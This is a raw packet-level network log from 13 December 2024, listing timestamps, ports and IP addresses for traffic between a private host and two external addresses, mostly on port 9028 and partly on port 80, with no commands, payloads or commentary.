Dec 13, 2024 08:25:21.021903992 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021914005 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021920919 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021922112 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.021971941 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.022070885 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.023091078 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023104906 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023114920 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023376942 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023479939 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023493052 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023503065 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023513079 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023523092 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023533106 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023542881 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023552895 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023561954 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023583889 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023592949 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.023603916 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.024210930 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.024522066 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.024522066 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.024522066 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.024705887 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.264447927 CET	49719	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:21.271241903 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271255016 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271265030 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271275043 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271285057 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271301031 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271440983 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.271522999 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271645069 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271657944 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.271934032 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.272214890 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272228003 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272264957 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272274971 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272284031 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272294044 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272351027 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272367954 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272380114 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272380114 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.272428989 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.272582054 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.272609949 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272623062 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272633076 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272644043 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272653103 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272661924 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272835970 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.272854090 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272881031 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.272933960 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.274023056 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.274537086 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274662971 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274674892 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274912119 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274924040 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274934053 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274944067 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274952888 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274962902 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274971962 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274981976 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.274991035 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.275000095 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.275144100 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.275168896 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.275182009 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.275192022 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.275469065 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.379502058 CET	80	49719	104.16.185.241	192.168.11.20
Dec 13, 2024 08:25:21.379760027 CET	49719	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:21.522093058 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522105932 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522115946 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522125959 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522135019 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522332907 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522346020 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522355080 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522365093 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522449970 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.522588968 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.522970915 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522981882 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.522993088 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523103952 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523109913 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.523116112 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523127079 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523174047 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.523236036 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523247957 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523257971 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523289919 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523300886 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523309946 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523319960 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523329973 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523338079 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.523343086 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.523463011 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.524343967 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.524353981 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.524554014 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.525556087 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525639057 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525650978 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525660038 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525670052 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525793076 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.525871992 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525883913 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525901079 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525914907 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.525995970 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.526009083 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.526017904 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.526027918 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.526036978 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.526046991 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.526057005 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.527098894 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.527098894 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.527098894 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.527245998 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.773067951 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773081064 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773091078 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773099899 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773109913 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773310900 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773325920 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773335934 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773345947 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773408890 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.773560047 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773569107 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.773753881 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.773811102 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.773977041 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774070978 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774080992 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774091005 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774100065 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774110079 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774118900 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774128914 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774137974 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774147034 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774156094 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774166107 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774173975 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.774250984 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.774418116 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.775011063 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.775022984 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.775178909 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.776237965 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.776251078 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.776371956 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.776385069 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777452946 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.777452946 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.777642012 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777848959 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777861118 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777872086 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777882099 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777892113 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777900934 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777910948 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777920008 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.777929068 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.778117895 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.778127909 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.778625011 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.778625965 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.024354935 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024398088 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024429083 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024456978 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024487972 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024516106 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024547100 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024574995 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024604082 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024679899 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.024817944 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024857044 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024885893 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024914026 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024941921 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.024971962 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025001049 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025028944 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025057077 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025085926 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025088072 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.025114059 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025142908 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025167942 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.025190115 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025242090 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025273085 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025295019 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.025415897 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.025907040 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.025944948 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.026150942 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.028377056 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.028417110 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.028446913 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.028476000 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.028584957 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.028659105 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.029434919 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029475927 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029505014 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029534101 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029562950 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029612064 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029654980 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029685020 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029714108 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029742956 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029771090 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.029799938 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.030469894 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.030560017 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.030781984 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.276119947 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276139975 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276154995 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276169062 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276182890 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276196957 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276211023 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276226044 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276240110 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276253939 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276264906 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276278019 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276290894 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276304960 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276318073 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276330948 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276344061 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276346922 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.276434898 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.276588917 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.276597023 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276613951 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276633978 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276655912 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276673079 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276684999 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276699066 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276711941 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276726007 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276771069 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.276823044 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.276876926 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276894093 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.276901007 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.276907921 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.277046919 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.287971020 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.287988901 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288003922 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288017988 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288032055 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288045883 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288132906 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288151026 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288166046 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288178921 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288193941 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288217068 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.288285017 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.288490057 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.312535048 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.439690113 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.440072060 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.442979097 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.802100897 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:22.803330898 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:22.812303066 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:23.054317951 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:23.063738108 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:25.971859932 CET	49723	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:26.085985899 CET	80	49723	104.16.185.241	192.168.11.20
Dec 13, 2024 08:25:26.086286068 CET	49723	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:26.086349964 CET	49723	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:26.200323105 CET	80	49723	104.16.185.241	192.168.11.20
Dec 13, 2024 08:25:26.208214998 CET	80	49723	104.16.185.241	192.168.11.20
Dec 13, 2024 08:25:26.249607086 CET	49723	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:31.201647043 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:31.490780115 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:31.491043091 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:31.737843990 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:31.738959074 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.036463976 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.036627054 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.092842102 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.092842102 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.092874050 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.092948914 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.092948914 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.092983961 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.331325054 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.344263077 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.344284058 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.344299078 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.344455004 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.344542980 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.344604969 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:32.595632076 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.595649004 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.960001945 CET	9028	49722	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:32.960232973 CET	49722	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:44.635782957 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:44.927485943 CET	9028	49715	147.185.221.22	192.168.11.20
